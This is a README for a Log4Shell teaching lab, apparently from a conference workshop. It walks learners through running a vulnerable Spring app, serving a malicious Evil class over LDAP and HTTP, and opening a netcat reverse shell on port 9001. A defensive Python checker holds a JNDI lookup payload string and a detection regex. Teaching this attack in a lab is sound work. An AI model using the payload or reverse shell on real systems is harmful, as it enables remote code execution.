mika-bar/log4j-minilab
LOG4J Mini Lab

The Log4J incident from December 2021 was one of the biggest and most impactful security issues in recent Java history.

In this minilab, we will look into the vulnerability and try to create our own server.

Check out this repository

git clone https://github.com/bmvermeer/log4j-minilab.git

The repository contains an application and a template for a malicious log4shell server.

Running the application

cd log4japp
./mvnw compile spring-boot:run

Running the server

cd log4shell-server
./mvnw compile exec:java

The application contains a vulnerable Log4j version. It evaluates JNDI lookups in logged messages, so you can make it connect to an LDAP server that you own and achieve arbitrary code execution. The log4shell-server already contains an incomplete LDAP server based on the marshalsec project by Moritz Bechler. This server returns a reference to Evil.class, which is served to the application by an HTTP server. Both the LDAP server and the HTTP server are fully functional.

Assignment 1

Check if we are vulnerable

  • Start up the log4japp
  • Go to http://localhost:8080/
  • Try to log in with an incorrect username and password.
  • See in the console what is logged
  • Check whether the log4j version in use is vulnerable (<2.15)
  • Start up the log4shell-server and try to connect to the server
  • If the console gives you a javax.naming.NamingException with Root exception is java.lang.ClassCastException, then you are on the right track.
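The checks in Assignment 1 from the defender's side, as an added example in Python that is not part of the lab's Java code: it reads the pinned Log4j version from a pom.xml fragment, compares it against the 2.15 threshold the assignment names, and flags console lines that carry a JNDI lookup string. The pom fragment, the log lines and their format are constructed, not the lab's real output.

```python
import re
from typing import Iterable, Optional

# Constructed pom.xml fragment in the Spring Boot style (a stand-in for the lab's own pom,
# which is not reproduced here). Spring Boot pins Log4j via the log4j2.version property.
SAMPLE_POM = """<project>
  <properties>
    <java.version>17</java.version>
    <log4j2.version>2.14.1</log4j2.version>
  </properties>
</project>"""

# Constructed console lines in the Spring Boot format; the real pattern depends on the app.
SAMPLE_LOG = [
    "2021-12-10 14:02:11.301 ERROR 4242 --- [nio-8080-exec-1] LoginController : Login failed for user alice",
    "2021-12-10 14:02:19.877 ERROR 4242 --- [nio-8080-exec-2] LoginController : Login failed for user ${jndi:ldap://127.0.0.1:1389/Evil}",
    "2021-12-10 14:02:25.004 INFO  4242 --- [nio-8080-exec-3] LoginController : Login ok for user bob",
]

# Lookup syntax Log4j 2 evaluates inside a logged message: ${jndi:<scheme>:...}
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(?P<scheme>ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)

def parse_version(version: str) -> tuple:
    """'2.14.1' -> (2, 14, 1); pads to three numbers so '2.15' compares equal to '2.15.0'."""
    parts = [int(p) for p in re.findall(r"\d+", version)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))

def is_vulnerable_version(version: str, fixed: str = "2.15.0") -> bool:
    """True when log4j-core is below the threshold the lab uses (<2.15)."""
    return parse_version(version) < parse_version(fixed)

def log4j_version_from_pom(pom_xml: str) -> Optional[str]:
    """Read the pinned Log4j version from the Spring Boot property or an explicit log4j-core dependency."""
    m = re.search(r"<log4j2\.version>\s*([^<\s]+)\s*</log4j2\.version>", pom_xml)
    if m is None:
        m = re.search(r"<artifactId>log4j-core</artifactId>\s*<version>\s*([^<\s]+)\s*</version>", pom_xml)
    return m.group(1) if m else None

def find_jndi_lookups(lines: Iterable[str]) -> list:
    """(line number, scheme) for every log line that carries a JNDI lookup string."""
    hits = []
    for n, line in enumerate(lines, start=1):
        m = JNDI_LOOKUP.search(line)
        if m:
            hits.append((n, m.group("scheme").lower()))
    return hits

if __name__ == "__main__":
    v = log4j_version_from_pom(SAMPLE_POM)
    print(f"log4j-core {v}: vulnerable={is_vulnerable_version(v)}")
    for n, scheme in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup via {scheme}")
```

Point it at the lab's real pom.xml and console output to confirm what the assignment asks you to verify by hand.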

Assignment 2

Implement class Evil

Implement class Evil so that it prints “HACKED AT DEVOXXUK” when we load it using the LDAP string from before.

Assignment 3

Try to execute a command.

For instance open the calculator on your machine.

Assignment 4

Create a reverse shell attack

  • Install netcat on your machine
  • Open netcat and listen on port 9001 (in a new shell window)
  • Edit your Evil class so that it opens a connection to your (local) host on port 9001
  • If everything works out, netcat is now connected to your machine and you have shell access. Imagine doing this on a remote machine :)
